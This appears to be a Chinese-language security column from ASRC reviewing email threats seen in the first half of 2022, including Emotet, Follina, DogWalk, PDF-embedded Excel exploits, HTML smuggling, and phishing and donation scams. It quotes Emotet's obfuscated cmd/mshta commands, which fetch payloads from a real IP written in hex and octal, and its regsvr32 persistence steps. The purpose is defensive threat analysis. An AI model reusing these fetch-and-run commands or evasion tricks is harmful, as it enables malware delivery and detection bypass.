惡意郵件再掀加密新伎倆　HTML附檔詐用瀏覽器

今（2022）年第一季，所有企業都能明顯感覺到的威脅郵件，即是Emotet的濫發。Emotet的濫發，使用了各種藏匿及混淆的手段，用以躲避防毒及資安防護軟體的檢測，而其中最重要的一個手段就是「壓縮加密」。過去，在傳輸檔案前先經過「壓縮加密」，多半是為了保護機敏文件在傳輸過程中，不被傳遞管道的中間人取得或窺探的防護手段；而現在，卻經常成為惡意程式用以躲避資安檢測的保護傘。

第二季的電子郵件攻擊，以釣魚郵件占多數，其次是帶有加密病毒附件檔的郵件，其數量較第一季約成長四倍。透過大量連線攻擊的次數則約為第一季的兩倍。上半年觀察到「加密」手段及Follina漏洞的利用，至截稿前都沒有明顯趨緩的態勢。前者多半用於無針對性的廣泛攻擊，後者則多為國家級APT愛用的手法，值得大家留意後續的利用與發展。

以下是ASRC研究中心在2022年上半觀察到的幾個特殊的郵件案例：

Emotet捲土重來 以加密惡意附件躲避防禦偵測

雖然歐洲刑警組織（Europol）與其他八個國家的執法機構在2021年初聯手破獲了Emotet殭屍網路，但新的Emotet伺服器和惡意軟體樣本又在2021年11月14日出現，並透過電子郵件大量散播。

Emotet的垃圾郵件攻擊行動所夾帶於郵件裡的惡意Office文件多為xls、xlsx、xlsm、doc、docx、docm等等，部分以zip加上密碼的方式，躲避資安防禦工事的偵測。當收件者不慎執行惡意Office文件內的巨集，Office文件內記錄的URL清單即會被嘗試下載，副檔名可能為.ocx檔，但實為DLL的檔案。接著，使用「regsvr32.exe -s」指令，於收件者的Windows內執行.ocx。

接下來，進行潛伏。將.ocx複製到使用者目錄下的「AppData\Local\隨機目錄名稱」，並隨機取名xxxxxxx.yyy（x長度不定），再將該.ocx刪除。執行「C:\Windows\system32\regsvr32.exe /s "C:\Users\使用者名稱AppData\Local\隨機目錄名稱」下的惡意檔案，並透過Registry設定開機執行。

較特別的是，用以隱匿惡意檔案的連結，使用了多種手法躲避，例如分別使用十六進位、八進位的方法，來存放遠端伺服器的IP位址，進而讓Emotet下載第二階段的惡意程式，現行的資安防護系統很可能無法察覺異狀。圖1為一個示例，同一網址可表達為：

十進位格式：hxxp://185.7.214.7

十六進位格式：hxxp://0xb907d607

八進位格式：hxxp://0056.0151.0121.0114

以上格式，瀏覽器都可以解析。實際上在Office攻擊文件中還搭配了混淆手段，呈現如下，這讓許多URI格式的惡意指標偵測失靈（圖2)：

cmd /c m^sh^t^a h^tt^p^:/^/ [0x]b907d607/fer/fer.html cmd /c m^sh^t^a h^tt^p^:/^/0056 [.]0151[.]0121[.]0114/c.html

新漏洞攻擊接連爆發

接連爆發Follina、Dogwalk等新的漏洞攻擊，以下分別加以說明：

Follina攻擊透過電子郵件觸發

微軟於5月30日公布位於MSDT（MS Support Diagnostic Tool）的Windows漏洞CVE-2022-30190，這個漏洞被命名為Follina，因為一開始發現的攻擊檔案名稱有著0438這個數字（05-2022-0438.rar），0438是義大利Follina的區號，因而得名。 這個漏洞是Windows本身的漏洞，但觸發方式可透過電子郵件來進行：在電子郵件中以附件檔夾帶一個惡意的Office文件檔或是RTF文件檔，並利用Office程式向外抓取一個惡意的HTML檔（圖3），再藉此惡意HTML檔使用「ms-msdt」MSProtocol URI scheme以載入一段程式碼，觸發PowerShell執行（圖4）。

DogWalk利用微軟MSDT延伸漏洞 

與Follina同樣是MSDT透過電子郵件的利用，另一種攻擊方式是透過電子郵件寄送惡意超連結的方式，令受害者下載一個惡意的diagcab檔，並以社交工程的方式誘騙受害者點擊才能觸發。觸發後利用路徑∕目錄穿越（Path Traversal），允許攻擊者將任何檔案存放在檔案系統任何地方，例如Windows的「啟動」資料夾中，進行長期的潛伏，並且這個過程完全是安靜的。這種攻擊方式有另一個暱稱為DogWalk。

透過攻擊新手法提高駭侵成功率

接著，說明幾種新的攻擊手法。

透過PDF掩護夾帶惡意Office檔案

四月份，我們發現有夾帶惡意Office檔案的PDF檔。這種惡意檔案的本體，是一個利用了Excel預設密碼加密過的惡意xls檔案，所利用的漏洞為CVE-2017-11882，內嵌於PDF的附件之中，利用PDF編碼作為掩護，使得防毒或資安檢測軟體極難辨識，如圖5～圖7所示。 當受害者不慎透過Adobe Acrobat Reader等PDF閱讀工具開啟了這個惡意的PDF檔案時，會自動詢問是否要開啟其中的惡意附件檔案，若受害者不慎同意開啟，則惡意檔案即會於受害者的電腦上安裝後門程式。要防範此類攻擊，除了採用較好的資安檢測機制外，在打開檔案時的任何軟體警示最好都不要輕易忽視。

透過呼叫瀏覽器，解碼藏在HTML檔中的壓縮檔

在過去，將各種威脅檔案隱藏在壓縮檔裡，是很常見的行為。因為壓縮檔給了惡意程式一個外殼，需要進行解壓縮才能分析，但這對於多數的資安分析機制都不是什麼大問題。於是，攻擊者在壓縮檔加上密碼，並於郵件中告知受害者密碼，就有機會躲過偵測並執行後續的後門安裝。我們在本季看到了一個有別於傳統攻擊手段的利用。

這個特別的利用方式是，在電子郵件的附件檔中放入一個HTML檔案，當這個HTML檔被受害者點擊後，「下載」一個加密的惡意檔案（圖8）。事實上，這並非真的從網路上「下載」一個惡意檔案，而是透過瀏覽器解碼出內嵌於HTML內的一個加密惡意檔案，由於這個檔案不是從外部而來（圖9），因此瀏覽器的檔案下載保護，及Windows內建的「網路標記」（Mark of the Web）保護也會因此失效。根據分析的惡意樣本，加密的zip裡是一個PE檔的後門程式。

防範釣魚郵件教學的釣魚郵件

上半年發現一個有趣的案例：教人防範釣魚郵件的教學，內容卻是帶有連往釣魚網站的釣魚郵件（圖10）。不過，當好奇想了解這個網站想釣是哪些資料時，釣魚頁面已經顯示這個頁面遭到停權。

針對電商帳號的釣魚攻擊

在三月份，我們觀察到針對特定電商的釣魚郵件（圖11），這些釣魚郵件主要詐騙的目標為電商平台的登入帳號密碼。在成功取得帳密後，除了能利用電商進行一些虛假交易外，帳號密碼也可能被拿到其他的社群、電商、電子郵件登入入口嘗試憑證填充（Credential Stuffing）攻擊。釣魚網站的域名都在近期申請，並利用三或四級域名將電商品牌關鍵字包含在內，讓收件者因此放下戒心（圖12）。

寄發烏俄戰爭議題的詐騙郵件

廣受關注的實事議題一直都是駭客愛用的工具。2022年2月24日爆發烏俄戰爭，從三月初開始有大量假藉戰爭募款的詐騙郵件四處流竄。與過去常見的419scam不同的地方是，詐騙信的內容提及由於戰爭的關係，銀行已經無法正常作業，因此募集的是以比特幣為主的加密貨幣（圖13）。

結語

自勒索軟體出現之後，大家看見了「加密」手段的兩面刃性質，企業對於加密的看法也從過去的「保護機敏文件」用途，開始有了「躲避檢查」的懷疑。因此，企業對於加密檔案的檢查規範，勢必要增加一個將不合理加密情況視為威脅的考量；而在電子郵件安全早期還不受重視時，多數的收信軟體或Webmail，幾乎都能像瀏覽器一樣完整地執行各種網頁程式。隨著時間推移，慢慢也意識到電子郵件這個管道若不進行管控或限縮，會是一個可以主動攻擊的破口。因此，現在的收信軟體或是Webmail都不再能直接執行各種網頁程式。而攻擊者在演化的過程中留意到了電子郵件可夾帶各種附件的可能性，開始透過夾帶各種惡意檔案以利用這些檔案開啟軟體的漏洞。HTML檔可以呼叫瀏覽器開啟，在過去經常被用來做離線釣魚，這次看到了離線下載檔案攻擊樣本，未來在呼叫瀏覽器的利用方面恐怕將更加深化和普及化。

＜本文作者：高銘鍾現為ASRC垃圾訊息研究中心主任。＞